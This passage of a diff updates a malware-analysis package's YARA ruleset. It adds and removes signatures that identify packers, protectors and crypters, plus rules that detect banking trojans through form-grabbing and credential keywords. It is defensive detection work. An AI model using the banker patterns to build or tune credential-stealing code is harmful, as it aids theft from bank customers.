+		$a0 = { BF 00 ?? 40 00 BE ?? ?? ?? 00 E8 9D 00 00 00 B8 ?? ?? ?? 00 8B 30 8B 78 04 BB ?? ?? ?? 00 8B 43 04 91 E3 1F 51 FF D6 56 96 8B 13 8B 02 91 E3 0D 52 51 56 FF D7 5A 89 02 83 C2 04 EB EE 83 C3 08 5E EB DB B9 ?? ?? 00 00 BE 00 ?? ?? 00 EB 01 00 BF ?? ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EncryptPE1200331812003518WFS
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 79 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv09781
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 49 87 40 ?? 87 DD 8B 85 CE 87 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv09782
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB D1 84 40 ?? 87 DD 8B 85 56 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01Gleam100Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 0B 83 EC 0C 53 56 57 E8 24 02 00 FF E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPackAltStubDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 09 00 00 00 C3 F6 00 00 E9 06 02 00 00 33 C9 5E 87 0E E3 F4 2B F1 8B DE AD 2B D8 AD }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxModificationofHi924
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 53 51 52 1E 06 9C B8 21 35 CD 21 53 BB ?? ?? 26 ?? ?? 49 48 5B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor226DLLminimumprotection
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 8B C6 87 04 24 68 ?? ?? ?? ?? 5E E9 ?? ?? ?? ?? 85 C8 E9 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 0F 81 ?? ?? ?? 00 81 FA ?? ?? ?? ?? 33 D0 E9 ?? ?? ?? 00 0F 8D ?? ?? ?? 00 81 D5 ?? ?? ?? ?? F7 D1 0B 15 ?? ?? ?? ?? C1 C2 ?? 81 C2 ?? ?? ?? ?? 9D E9 ?? ?? ?? ?? C1 E2 ?? C1 E8 ?? 81 EA ?? ?? ?? ?? 13 DA 81 E9 ?? ?? ?? ?? 87 04 24 8B C8 E9 ?? ?? ?? ?? 55 8B EC 83 C4 F8 89 45 FC 8B 45 FC 89 45 F8 8B 45 08 E9 ?? ?? ?? ?? 8B 45 E0 C6 00 00 FF 45 E4 E9 ?? ?? ?? ?? FF 45 E4 E9 ?? ?? ?? 00 F7 D3 0F 81 ?? ?? ?? ?? E9 ?? ?? ?? ?? 87 34 24 5E 8B 45 F4 E8 ?? ?? ?? 00 8B 45 F4 8B E5 5D C3 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule yodasProtector102AshkibizDanehlar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 E8 03 00 00 00 EB 01 ?? E8 AB 00 00 00 E8 03 00 00 00 EB 01 ?? 83 FB 55 E8 03 00 00 00 EB 01 ?? 75 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ACProtectv135riscosoftwareIncAnticrackSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 55 53 45 52 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 47 65 74 50 72 6F 63 }
+
+condition:
+		$a0
+}
+	
+	
+rule upx_0_80_to_1_24 : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="25/02/2013"
+		description="UPX 0.80 to 1.24"
+
+	strings:
+		$str1={6A 60 68 60 02 4B 00 E8 8B 04 00 00 83 65 FC 00 8D 45 90 50 FF 15 8C F1 48 00 C7 45 FC FE FF FF FF BF 94 00 00 00 57}
+		
+	condition:
+		$str1 at pe.entry_point
+}
+
+rule upx_1_00_to_1_07 : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="19/03/2013"
+		description="UPX 1.00 to 1.07"
+
+	strings:
+		$str1={60 BE 00 ?0 4? 00 8D BE 00 B0 F? FF ?7 8? [3] ?0 9? [0-9] 90 90 90 90 [0-2] 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0}
+		
+	condition:
+		$str1 at pe.entry_point
+}
+
+rule upx_3 : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="25/02/2013"
+		description="UPX 3.X"
+
+	strings:
+		$str1={60 BE 00 [2] 00 8D BE 00 [2] FF [1-12] EB 1? 90 90 90 90 90 [1-3] 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01}
+		
+	condition:
+		$str1 at pe.entry_point
+}
+
+rule obsidium : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="21/01/2013"
+		last_edit="17/03/2013"
+		description="Obsidium"
+
+	strings:
+		$str1={EB 02 [2] E8 25 00 00 00 EB 04 [4] EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 [2] C3 EB 02 [2] EB 04} /*EntryPoint*/
+		
+	condition:
+		$str1 at pe.entry_point
+}
+
+rule pecompact2 : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="25/02/2013"
+		description="PECompact"
+
+	strings:
+		$str1={B8 [3] 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43} /*EntryPoint*/
+		
+	condition:
+		$str1 at pe.entry_point
+}
+
+rule aspack : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="25/02/2013"
+		description="ASPack"
+
+	strings:
+		$str1={60 E8 00 00 00 00 5D 81 ED 5D 3B 40 00 64 A1 30 00 00 00 0F B6 40 02 0A C0 74 04 33 C0 87 00 B9 ?? ?? 00 00 8D BD B7 3B 40 00 8B F7 AC} /*EntryPoint*/
+		
+	condition:
+		$str1 at pe.entry_point
+}
+
+rule execryptor : Protector
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="25/02/2013"
+		description="EXECryptor"
+
+	strings:
+		$str1={E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 B8 00 00 00 00 00 00 00 31 C0 89 41 14 89 41 18 80 A1 C1 00 00 00 FE C3 31 C0 64 FF 30 64 89 20 64 8F 05 00 00 00 00} /*EntryPoint*/
+		
+	condition:
+		$str1 at pe.entry_point
+}
+
+rule winrar_sfx : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="18/03/2013"
+		description="Winrar SFX Archive"
+	
+	strings:
+		$signature1={00 00 53 6F 66 74 77 61 72 65 5C 57 69 6E 52 41 52 20 53 46 58 00} 
+		
+	condition:
+		$signature1
+}
+
+rule mpress_2_xx_x86 : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="19/03/2013"
+		last_edit="24/03/2013"
+		description="MPRESS v2.XX x86  - no .NET"
+	
+	strings:
+		$signature1={60 E8 00 00 00 00 58 05 [2] 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 51 49 8A 44 39 06 88 04 31 75 F6}
+		
+	condition:
+		$signature1 at pe.entry_point
+}
+
+rule mpress_2_xx_x64 : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="19/03/2013"
+		last_edit="24/03/2013"
+		description="MPRESS v2.XX x64  - no .NET"
+	
+	strings:
+		$signature1={57 56 53 51 52 41 50 48 8D 05 DE 0A 00 00 48 8B 30 48 03 F0 48 2B C0 48 8B FE 66 AD C1 E0 0C 48 8B C8 50 AD 2B C8 48 03 F1 8B C8 57 44 8B C1 FF C9 8A 44 39 06 88 04 31} 
+		
+	condition:
+		$signature1 at pe.entry_point
+}
+
+rule mpress_2_xx_net : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="24/03/2013"
+		description="MPRESS v2.XX .NET"
+	
+	strings:
+		$signature1={21 46 00 69 00 6C 00 65 00 20 00 69 00 73 00 20 00 69 00 6E 00 76 00 61 00 6C 00 69 00 64 00 2E 00 00 0D 4D 00 50 00 52 00 45 00 53 00 53 00 00 00 00 00 2D 2D 93 6B 35 04 2E 43 85 EF}
+		
+	condition:
+		$signature1
+}
+
+rule rpx_1_xx : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="24/03/2013"
+		description="RPX v1.XX"
+	
+	strings:
+		$signature1= "RPX 1."
+		$signature2= "Copyright ©  20"
+		
+	condition:
+		$signature1 and $signature2
+}
+
+rule mew_11_xx : Packer
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="25/03/2013"
+		description="MEW 11"
+	
+	strings:
+		$signature1={50 72 6F 63 41 64 64 72 65 73 73 00 E9 [6-7] 00 00 00 00 00 00 00 00 00 [7] 00}
+		$signature2="MEW"
+		
+	condition:
+		$signature1 and $signature2
+}
+
+rule yoda_crypter_1_2 : Crypter
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="15/04/2013"
+		description="Yoda Crypter 1.2"
+	
+	strings:
+		$signature1={60 E8 00 00 00 00 5D 81 ED F3 1D 40 00 B9 7B 09 00 00 8D BD 3B 1E 40 00 8B F7 AC [19] EB 01 [27] AA E2 CC}
+		
+	condition:
+		$signature1 at pe.entry_point
+}
+
+rule yoda_crypter_1_3 : Crypter
+{
+	meta:
+		author="Kevin Falcoz"
+		date_create="15/04/2013"
+		description="Yoda Crypter 1.3"
+	
+	strings:
+		$signature1={55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 6C 28 40 00 B9 5D 34 40 00 81 E9 C6 28 40 00 8B D5 81 C2 C6 28 40 00 8D 3A 8B F7 33 C0 EB 04 90 EB 01 C2 AC}
+		
+	condition:
+		$signature1 at pe.entry_point
+}
+rule dotfuscator : packer
+{
+	meta:
+		author = "Jean-Philippe Teissier / @Jipe_"
+		description = "Dotfuscator"
+		date = "2013-02-01"
+		filetype = "memory"
+		version = "1.0" 
+
+	strings:
+		$a = "Obfuscated with Dotfuscator"
+
+	condition:
+		$a
+}
+rule AutoIt : packer
+{
+	meta:
+		author = "Jean-Philippe Teissier / @Jipe_"
+		description = "AutoIT packer"
+		date = "2013-02-01"
+		filetype = "memory"
+		version = "1.0" 
+
+	strings:	
+		$a = "This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support."
+
+	condition:
+		$a
+}
+rule mumblehard_packer
+{
+    meta:
+        description = "Mumblehard i386 assembly code responsible for decrypting Perl code"
+        author = "Marc-Etienne M.Léveillé"
+        date = "2015-04-07"
+        reference = "http://www.welivesecurity.com"
+        version = "1"
+
+    strings:
+
+	$decrypt = { 31 db [1-10] ba ?? 00 00 00 [0-6] (56 5f | 89 F7) 39 d3 75 13 81 fa ?? 00 00 00 75 02 31 d2 81 c2 ?? 00 00 00 31 db 43 ac 30 d8 aa 43 e2 e2 }
+
+    condition:
+        $decrypt
+}
diff -Nru remnux-rules-0.0.3/yara/packer.yara remnux-rules-0.0.4/yara/packer.yara
--- remnux-rules-0.0.3/yara/packer.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/packer.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,20167 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
-
-*/
-
-import "pe"
-
-
-rule silent_banker : banker
-{
-      meta:
-		author="malware-lu"
-    strings: 
-        $a = {6A 40 68 00 30 00 00 6A 14 8D 91}  
-        $b = {8D 4D B0 2B C1 83 C0 27 99 6A 4E 59 F7 F9}
-        $c = "UVODFRYSIHLNWPEJXQZAKCBGMT"
-
-    condition:
-        $a or $b or $c
-}
-
-rule zbot : banker
-{
-      meta:
-		author="malware-lu"
-     strings: 
-        $a = "__SYSTEM__" wide
-        $b = "*tanentry*"
-        $c = "*<option"
-        $d = "*<select"
-        $e = "*<input"
-
-     condition:
-        ($a and $b) or ($c and $d and $e)
-}
-
-rule banbra : banker
-{
-      meta:
-		author="malware-lu"
-    strings: 
-        $a = "senha" fullword nocase
-        $b = "cartao" fullword nocase
-        $c = "caixa" 
-        $d = "login" fullword nocase
-        $e = ".com.br"
-
-     condition:
-        #a > 3 and #b > 3 and #c > 3 and #d > 3 and #e > 3              
-}
-
-rule Borland 
-{
-      meta:
-		author="malware-lu"
-	strings:
-		$patternBorland = "Borland" wide ascii
-	condition:
-		$patternBorland 
-}
-
-rule java 
-{
-      meta:
-		author="malware-lu"
-	strings:
-		$patternjava = "java" wide ascii
-	condition:
-		$patternjava
-}
-rule NET 
-{
-      meta:
-		author="malware-lu"
-	strings:
-		
-		$patternnet = ".NET" wide ascii
-	condition:
-		$patternnet
-}
-
-
-rule MSLRHv032afakePCGuard4xxemadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FC 55 50 E8 00 00 00 00 5D EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 58 5D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EnigmaProtector1XSukhovVladimirSergeNMarkin
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 4D 65 73 73 61 67 65 42 6F 78 41 00 00 00 52 65 67 43 6C 6F 73 65 4B 65 79 00 00 00 53 79 73 46 72 65 65 53 74 72 69 6E 67 00 00 00 43 72 65 61 74 65 46 6F 6E 74 41 00 00 00 53 68 65 6C 6C 45 78 65 63 75 74 65 41 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule SPLayerv008
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8D 40 00 B9 ?? ?? ?? ?? 6A ?? 58 C0 0C ?? ?? 48 ?? ?? 66 13 F0 91 3B D9 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule DxPackV086Dxd
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 8B FD 81 ED 06 10 40 00 2B BD 94 12 40 00 81 EF 06 00 00 00 83 BD 14 13 40 00 01 0F 84 2F 01 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv110EngdulekxtMicrosoftVisualC60
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3 }
-	$a1 = { 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3 AB EB 02 CD 20 5E 80 CB AA 2B F1 EB 02 CD 20 43 0F BE 38 13 D6 80 C3 47 2B FE EB 01 F4 03 FE EB 02 4F 4E 81 EF 93 53 7C 3C 80 C3 29 81 F7 8A 8F 67 8B 80 C3 C7 2B FE }
-	$a2 = { 91 EB 02 CD 20 BF 50 BC 04 6F 91 BE D0 ?? ?? 6F EB 02 CD 20 2B F7 EB 02 F0 46 8D 1D F4 00 }
-	$a3 = { C1 CE 10 C1 F6 0F 68 00 ?? ?? 00 2B FA 5B 23 F9 8D 15 80 ?? ?? 00 E8 01 00 00 00 B6 5E 0B }
-	$a4 = { D1 E9 03 C0 68 80 ?? ?? 00 EB 02 CD 20 5E 40 BB F4 00 00 00 33 CA 2B C7 0F B6 16 EB 01 3E }
-	$a5 = { E8 01 00 00 00 0E 59 E8 01 00 00 00 58 58 BE 80 ?? ?? 00 EB 02 61 E9 68 F4 00 00 00 C1 C8 }
-	$a6 = { EB 01 4D 83 F6 4C 68 80 ?? ?? 00 EB 02 CD 20 5B EB 01 23 68 48 1C 2B 3A E8 02 00 00 00 38 }
-	$a7 = { EB 02 AB 35 EB 02 B5 C6 8D 05 80 ?? ?? 00 C1 C2 11 BE F4 00 00 00 F7 DB F7 DB 0F BE 38 E8 }
-	$a8 = { EB 02 CD 20 ?? CF ?? ?? 80 ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 }
-	$a9 = { F7 DB 80 EA BF B9 2F 40 67 BA EB 01 01 68 AF ?? ?? BA 80 EA 9D 58 C1 C2 09 2B C1 8B D7 68 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point or $a3 at pe.entry_point or $a4 at pe.entry_point or $a5 at pe.entry_point or $a6 at pe.entry_point or $a7 at pe.entry_point or $a8 at pe.entry_point or $a9 at pe.entry_point
-}
-	
-	
-rule TPPpackclane
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 5D 81 ED F5 8F 40 00 60 33 ?? E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv110EngdulekxtMicrosoftVisualC6070
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 0B D0 8B DA E8 02 00 00 00 40 A0 5A EB 01 9D B8 80 ?? ?? 00 EB 02 CD 20 03 D3 8D 35 F4 00 00 00 EB 01 35 EB 01 88 80 CA 7C 80 F3 74 8B 38 EB 02 AC BA 03 DB E8 01 00 00 00 A5 5B C1 C2 0B 81 C7 DA 10 0A 4E EB 01 08 2B D1 83 EF 14 EB 02 CD 20 33 D3 83 EF 27 }
-	$a1 = { 0B D0 8B DA E8 02 00 00 00 40 A0 5A EB 01 9D B8 80 ?? ?? ?? EB 02 CD 20 03 D3 8D 35 F4 00 }
-	$a2 = { 87 FE E8 02 00 00 00 98 CC 5F BB 80 ?? ?? 00 EB 02 CD 20 68 F4 00 00 00 E8 01 00 00 00 E3 }
-	$a3 = { F7 D8 40 49 EB 02 E0 0A 8D 35 80 ?? ?? ?? 0F B6 C2 EB 01 9C 8D 1D F4 00 00 00 EB 01 3C 80 }
-	$a4 = { F7 DB 80 EA BF B9 2F 40 67 BA EB 01 01 68 AF ?? A7 BA 80 EA 9D 58 C1 C2 09 2B C1 8B D7 68 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point or $a3 at pe.entry_point or $a4 at pe.entry_point
-}
-	
-	
-rule Thinstall24x25xJititSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? BD ?? ?? ?? ?? 03 E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule LocklessIntroPack
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 2C E8 ?? ?? ?? ?? 5D 8B C5 81 ED F6 73 ?? ?? 2B 85 ?? ?? ?? ?? 83 E8 06 89 85 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule AHTeamEPProtector03faketElock061FEUERRADER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 E9 00 00 00 00 60 E8 00 00 00 00 58 83 C0 08 F3 EB FF E0 83 C0 28 50 E8 00 00 00 00 5E B3 33 8D 46 0E 8D 76 31 28 18 F8 73 00 C3 8B FE B9 3C 02 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ExeStealth275aWebtoolMaster
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEArmor046Hying
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 AA 00 00 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 3D ?? ?? 00 2D ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B ?? ?? 00 5C ?? ?? 00 6F ?? ?? 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 }
-	$a1 = { E8 AA 00 00 00 2D ?? ?? ?? 00 00 00 00 00 00 00 00 3D }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule eXPressorv13CGSoftLabs
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 45 78 50 72 2D 76 2E 31 2E 33 2E }
-	$a1 = { 55 8B EC 83 EC ?? 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 33 2E 2E B8 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 74 13 A1 ?? ?? ?? ?? 03 05 ?? ?? ?? ?? 89 ?? ?? E9 ?? ?? 00 00 C7 05 }
-
-condition:
-		$a0 or $a1 at pe.entry_point
-}
-	
-	
-rule Upackv032BetaDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE 88 01 ?? ?? AD 50 ?? ?? AD 91 F3 A5 }
-	$a1 = { BE 88 01 ?? ?? AD 50 ?? AD 91 ?? F3 A5 }
-
-condition:
-		$a0 or $a1
-}
-	
-	
-rule MSLRHV031emadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 D1 CB 0F CA C1 CA E0 D1 CA 0F C8 EB 01 F1 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv184
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PCGuardforWin32v500SofProBlagojeCeklic
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FC 55 50 E8 00 00 00 00 5D 60 E8 03 00 00 00 83 EB 0E EB 01 0C 58 EB 01 35 40 EB 01 36 FF E0 0B 61 B8 ?? ?? ?? 00 EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 35 FF E0 E7 61 2B E8 9C EB 01 D5 9D EB 01 0B 58 60 E8 03 00 00 00 83 EB 0E EB 01 0C }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WiseInstallerStub
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 81 EC 78 05 00 00 53 56 BE 04 01 00 00 57 8D 85 94 FD FF FF 56 33 DB 50 53 FF 15 34 20 40 00 8D 85 94 FD FF FF 56 50 8D 85 94 FD FF FF 50 FF 15 30 20 40 00 8B 3D 2C 20 40 00 53 53 6A 03 53 6A 01 8D 85 94 FD FF FF 68 00 00 00 80 50 FF D7 83 F8 FF }
-	$a1 = { 55 8B EC 81 EC ?? 04 00 00 53 56 57 6A ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? 40 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? 20 }
-	$a2 = { 55 8B EC 81 EC ?? ?? 00 00 53 56 57 6A 01 5E 6A 04 89 75 E8 FF 15 ?? 40 40 00 FF 15 ?? 40 40 00 8B F8 89 7D ?? 8A 07 3C 22 0F 85 ?? 00 00 00 8A 47 01 47 89 7D ?? 33 DB 3A C3 74 0D 3C 22 74 09 8A 47 01 47 89 7D ?? EB EF 80 3F 22 75 04 47 89 7D ?? 80 3F 20 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2
-}
-	
-	
-rule AnskyaNTPackerGeneratorAnskya
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 F0 53 B8 88 1D 00 10 E8 C7 FA FF FF 6A 0A 68 20 1E 00 10 A1 14 31 00 10 50 E8 71 FB FF FF 8B D8 85 DB 74 2F 53 A1 14 31 00 10 50 E8 97 FB FF FF 85 C0 74 1F 53 A1 14 31 00 10 50 E8 5F FB FF FF 85 C0 74 0F 50 E8 5D FB FF FF 85 C0 74 05 E8 70 FC FF FF 5B E8 F2 F6 FF FF 00 00 48 45 41 52 54 }
-
-condition:
-		$a0
-}
-	
-	
-rule ThinstallVirtualizationSuite30493080ThinstallCompany
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 60 68 53 74 41 6C 68 54 68 49 6E E8 00 00 00 00 58 BB 37 1F 00 00 2B C3 50 68 ?? ?? ?? ?? 68 00 2C 00 00 68 04 01 00 00 E8 BA FE FF FF E9 90 FF FF FF CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 }
